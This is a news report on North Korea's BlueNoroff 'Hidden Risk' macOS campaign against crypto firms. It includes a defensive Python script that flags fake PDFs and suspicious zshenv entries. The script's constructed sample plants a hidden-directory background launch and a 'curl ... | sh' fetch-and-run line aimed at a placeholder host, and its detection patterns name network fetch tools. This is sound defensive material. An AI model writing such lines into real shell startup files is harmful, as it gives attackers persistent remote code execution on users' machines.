North Korean Hacker Group BlueNoroff Targets Crypto Firms with Malware
Key Takeaways
- The attack uses multi-stage malware designed to infect Apple’s macOS devices, aiming to compromise crypto firms.
- The attackers use phishing emails disguised as crypto news alerts to trick victims into downloading malware.
A North Korean hacking group, linked to the state-backed BlueNoroff operation, has launched a new cyber campaign targeting cryptocurrency firms, according to a recent report by SentinelOne. Dubbed Hidden Risk, the attack uses multi-stage malware designed to infect Apple’s macOS devices, aiming to compromise crypto firms.
BlueNoroff has previously deployed malware like RustBucket and ObjCShellz. This time, the hackers use phishing emails disguised as crypto news alerts to trick victims into downloading malware. The campaign, first noticed in October 2024 but potentially active since July, involves lures such as “Hidden Risk Behind New Surge of Bitcoin Price” and “Altcoin Season 2.0 – The Hidden Gems to Watch.” These emails, which appear to share news on cryptocurrency trends, prompt users to click on malicious links.
According to the SentinelOne researchers, the hackers impersonated real people from unrelated industries, making their phishing attempts seem more legitimate. In one instance, the attackers copied a genuine academic paper titled “Bitcoin ETF: Opportunities and Risks,” adding credibility to their scam. The phishing emails used the domain kalpadvisory[.]com, which has been flagged for spam in Indian financial forums.
Unlike BlueNoroff’s previous campaigns, which often involved complex social media engagement, Hidden Risk relies on simpler email-based phishing tactics. The malware is delivered as a dropper application mimicking a PDF file, written in Swift and initially signed with a valid Apple Developer ID. The application, named “Hidden Risk Behind New Surge of Bitcoin Price.app,” was notarized by Apple on October 19, 2024, before its signature was revoked.
Once the malware is activated, it downloads a decoy PDF while secretly retrieving a second-stage payload from a remote server. This payload is a backdoor that lets the attackers execute commands remotely. The malware also establishes persistence through the zshenv configuration file, a novel method that sidesteps the notifications macOS shows for background activity and so makes the implant harder to detect.
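The two details above that a defender can act on are the dropper posing as a PDF and the persistence entry planted in the zshenv file. The following Python is an added example, not code from SentinelOne or from the report: it checks whether a file that claims to be a PDF actually carries the `%PDF-` header, and it audits the text of a `~/.zshenv` for lines that launch something from a hidden directory, fetch content from the network, decode base64, or background a process. The regex heuristics and the sample zshenv content are assumptions constructed for the example; the report does not publish the exact line the malware writes.

```python
"""Defender-side checks for the two Hidden Risk behaviours described above.

Added example; not code from the SentinelOne report. The detection
heuristics below are assumptions, tuned for triage rather than certainty.
"""
import re
from pathlib import Path

# Every genuine PDF begins with this header; a renamed app bundle or Mach-O does not.
PDF_MAGIC = b"%PDF-"


def looks_like_real_pdf(data: bytes) -> bool:
    """Return True only if the bytes start with the PDF header."""
    return data.startswith(PDF_MAGIC)


# Heuristic patterns for lines in ~/.zshenv (assumptions, not from the report).
# The first pattern only fires when the hidden path sits in command position
# (start of line, after ';', '&', '|', 'nohup' or 'exec'), so that ordinary
# PATH exports such as "$HOME/.cargo/bin" are not flagged.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"(?:^|[;&|]\s*|\bnohup\s+|\bexec\s+)(?:~|\$HOME|/Users/[^/\s]+)/\.[^/\s]+/\S*"),
     "executes from a hidden directory"),
    (re.compile(r"\b(?:curl|wget)\b"), "network fetch at shell startup"),
    (re.compile(r"\bbase64\b.*(?:-d|--decode)"), "decodes base64 payload"),
    (re.compile(r"(?:&\s*$|\bnohup\b)"), "backgrounds a process"),
]


def audit_zshenv(text: str) -> list[tuple[int, str, str]]:
    """Scan zshenv content and return (line number, reason, line) for each hit.

    zshenv runs for every zsh invocation, interactive or not, which is why a
    command planted there survives reboots without registering a login item.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(line):
                findings.append((lineno, reason, line))
    return findings


# Constructed sample, not a real capture: three benign lines and two planted ones.
SAMPLE_ZSHENV = """\
# constructed sample ~/.zshenv for the example
export PATH="$HOME/.cargo/bin:$PATH"
export EDITOR=vim
alias ll='ls -la'
/Users/alice/.cache/.updater/helper &
curl -s https://example.invalid/stage2 | sh
"""


def audit_home_zshenv() -> list[tuple[int, str, str]]:
    """Audit the current user's real ~/.zshenv, if one exists."""
    path = Path.home() / ".zshenv"
    if not path.is_file():
        return []
    return audit_zshenv(path.read_text(errors="replace"))


if __name__ == "__main__":
    print("sample PDF header check:", looks_like_real_pdf(b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"))
    for lineno, reason, line in audit_zshenv(SAMPLE_ZSHENV):
        print(f"sample line {lineno}: {reason}: {line}")
    for lineno, reason, line in audit_home_zshenv():
        print(f"~/.zshenv line {lineno}: {reason}: {line}")
```

Run it as a script to see the hits on the constructed sample and on your own `~/.zshenv`; a clean dotfile that only sets variables and aliases produces no findings, while anything that executes or downloads at shell startup is worth a manual look.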
SentinelOne’s report warns that these tactics reflect North Korean hackers’ ability to adapt and exploit new vulnerabilities. The U.S. FBI had previously issued a warning in September 2024 about similar campaigns using social engineering tactics to target decentralized finance (DeFi) and crypto sectors.